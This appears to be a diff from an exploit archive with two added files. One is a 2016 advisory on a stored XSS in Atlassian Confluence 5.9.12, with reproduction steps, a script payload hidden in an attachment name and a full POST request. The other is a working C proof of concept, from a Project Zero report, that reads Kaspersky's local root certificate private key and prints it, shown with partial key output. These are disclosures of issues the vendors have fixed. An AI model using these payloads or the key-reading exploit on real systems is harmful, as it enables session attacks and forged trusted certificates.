+=====[ Tempest Security Intelligence - ADV-3/2016 CVE-2016-6283 ]==============
+
+  Persisted Cross-Site Scripting (XSS) in Confluence Jira Software
+  ----------------------------------------------------------------
+
+  Author(s):
+        - Jodson Santos
+        - jodson.santos@tempest.com.br
+
+  Tempest Security Intelligence - Recife, Pernambuco - Brazil
+
+=====[Table of Contents]=====================================================
+
+1. Overview
+2. Detailed description
+3. Affected versions & Solutions
+4. Timeline of disclosure
+5. Thanks & Acknowledgements
+6. References
+
+=====[1. Overview]============================================================
+
+ * System affected  : Atlassian Confluence
+ * Software Version : 5.9.12
+                      Other versions or models may also be affected.
+ * Impact           : This vulnerability allows an attacker to use
+Confluence's
+                      platform to deliver attacks against other users.
+
+=====[2. Detailed description]================================================
+
+Atlassian Confluence version 5.9.12 is vulnerable to persistent cross-site
+scripting (XSS) because it fails to securely validate user controlled data,
+thus making it possible for an attacker to supply crafted input in order to
+harm users. The bug occurs at pages carrying attached files, even though
+the attached file name parameter is correctly sanitized upon submission, it is
+possible for an attacker to later edit the attached file name property and
+supply crafted data (i.e HTML tags and script code) without the
+occurrence of any security checks, resulting in an exploitable persistent XSS.
+
+In order to reproduce the vulnerability, go to a page with an attached
+file, click on "Attachments" in order to list the page's attachments, and then
+click on "Properties" for the file of your choice. Edit the file name to, for
+example, <script>alert(1)</script>test.pdf and then save the changes.
+Albeit the XSS is not executed within the page display, it is possible to
+trigger the execution of the supplied code while performing a search within
+Confluence in which results include the attachment with crafted file name. For that
+matter, the search terms " or * will promptly display the file and execute the
+injected javascript code.
+
+As a means to further enlighten this, the following excerpt demonstrates
+a POST request with the malicious insertion within the newFileName field:
+
+POST
+/pages/doeditattachment.action?pageId={pageId}&attachmentBean.fileName={filename} HTTP/1.1
+Host: {confluence host}
+Cookie: mywork.tab.tasks=false; JSESSIONID={redacted};
+confluence.browse.space.cookie=space-templates
+Connection: keep-alive
+Content-Type: application/x-www-form-urlencoded
+Content-Length: {redacted}
+
+atl_token={atl_token}&pageId={pageId}&isFromPageView=false&newFileName=<script>alert(1)</script>file&newComment=&newContentType=application%2Foctet-stream&newParentPage=&confirm=Save
+
+It is worth noting that the issue may affect users regardless of privilege
+levels, since the malicious page/attachment can be browsed by any user
+within the Atlassian Confluence instance.
+
+=====[3. Affected versions & Solutions]=======================================
+
+This test was performed against Atlassian Confluence version 5.9.12.
+
+According to vendor's response, the vulnerability is addressed and the
+fix is part of the 5.10.6 release.
+
+=====[4. Timeline of disclosure]==============================================
+
+Jul/07/2016 - Vendor acknowledged the vulnerability.
+Aug/04/2016 - Vendor released the fix for the vulnerability in version 5.10.6.
+
+=====[5. Thanks & Acknowledgements]===========================================
+
+  - Tempest Security Intelligence / Tempest's Pentest Team [1]
+  - Joaquim Brasil
+  - Heyder Andrade
+  - Breno Cunha
+
+=====[6. References]==========================================================
+
+[1] https://en.wikipedia.org/wiki/Confluence_(software)

platforms/windows/local/40988.c

@@ -0,0 +1,67 @@
+/*
+Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=989
+
+When Kaspersky generate a private key for the local root, they store the private key in %ProgramData%. Obviously this file cannot be shared, because it's the private key for a trusted local root certificate and users can use it to create certificates, sign files, create new roots, etc. If I look at the filesystem ACLs, I should have access, and was about to complain that they've done this incorrectly, but it doesn't work and it took me a while to figure out what they were doing.
+
+$ icacls KLSSL_privkey.pem
+KLSSL_privkey.pem BUILTIN\Administrators:(I)(F)
+                  BUILTIN\Users:(I)(RX) <-- All users should have read access
+                  NT AUTHORITY\SYSTEM:(I)(F)
+
+Successfully processed 1 files; Failed processing 0 files
+$ cat KLSSL_privkey.pem
+cat: KLSSL_privkey.pem: Permission denied
+
+Single stepping through why this fails, I can see their filter driver will deny access from their PFLT_POST_OPERATION_CALLBACK after checking the Irpb. That sounds difficult to get right, and reverse engineering the filter driver, I can see they're setting Data->IoStatus.Status = STATUS_ACCESS_DENIED if the Irpb->Parameters (like DesiredAccess or whatever) don't match a hardcoded bitmask.
+
+But the blacklist is insufficient, they even missed MAXIMUM_ALLOWED (?!!!). This is trivial to exploit, any unprivileged user can now become a CA.
+*/
+
+#include <windows.h>
+#include <stdio.h>
+#include <io.h>
+#include <fcntl.h>
+
+int main(int argc, char **argv)
+{
+    HANDLE File;
+    BYTE buf[2048] = {0};
+    DWORD count;
+
+    File = CreateFile("c:\\ProgramData\\Kaspersky Lab\\AVP17.0.0\\Data\\Cert\\KLSSL_privkey.pem",
+            MAXIMUM_ALLOWED,
+            FILE_SHARE_READ | FILE_SHARE_WRITE,
+            NULL,
+            OPEN_EXISTING,
+            FILE_ATTRIBUTE_NORMAL,
+            NULL);
+    if (File != INVALID_HANDLE_VALUE) {
+        if (ReadFile(File, buf, sizeof(buf), &count, NULL) == TRUE) {
+            setmode(1, O_BINARY);
+            fwrite(buf, 1, count, stdout);
+        }
+        CloseHandle(File);
+        return 0;
+    }
+    return 1;
+}
+
+/*
+$ cl test.c
+Microsoft (R) C/C++ Optimizing Compiler Version 18.00.31101 for x86
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+test.c
+Microsoft (R) Incremental Linker Version 12.00.31101.0
+Copyright (C) Microsoft Corporation.  All rights reserved.
+
+/out:test.exe
+test.obj
+$ ./test.exe | openssl rsa -inform DER -text -noout
+Private-Key: (2048 bit)
+modulus:
+    00:b4:3f:57:21:e7:c3:45:e9:43:ec:b4:83:b4:81:
+    bb:d3:3b:9b:1b:da:07:55:68:e0:b1:75:38:b9:66:
+    0d:4c:e4:e7:f3:92:01:fb:33:bf:e6:34:e4:e8:db:
+    f1:7c:53:bc:95:2c:2d:08:8d:7c:8c:03:71:cd:07:
+*/